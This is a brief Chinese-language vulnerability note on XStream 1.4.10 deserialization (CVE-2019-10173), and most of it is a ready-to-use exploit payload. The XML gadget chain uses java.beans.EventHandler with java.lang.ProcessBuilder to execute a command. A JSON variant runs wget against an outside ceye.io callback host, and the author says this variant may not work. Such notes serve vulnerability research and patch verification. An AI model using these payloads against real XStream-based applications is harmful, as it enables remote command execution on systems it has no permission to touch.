xstream-1.4.10反序列化漏洞

0x00 CVE-2019-10173

参考http://x-stream.github.io/changes.html#1.4.11

0x01 payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>ping</string>
<string>xxxxx</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>

可能的变形(似乎并不行):

1
{"sorted-set":{"string":"foo","dynamic-proxy":{"interface":"java.lang.Comparable","handler":{"class":"java.beans.EventHandler","target":{"class":"java.lang.ProcessBuilder","command":["wget","http://2nmquk.ceye.io"]},"action":"start"}}}}

0x02 说明

XML的payload是没问题的,json这些是改的,不见得可以,主要问题在于那个XML属性不知道怎么对应到json格式,不过xstream的反序列化函数确实是支持json和XML同时传入的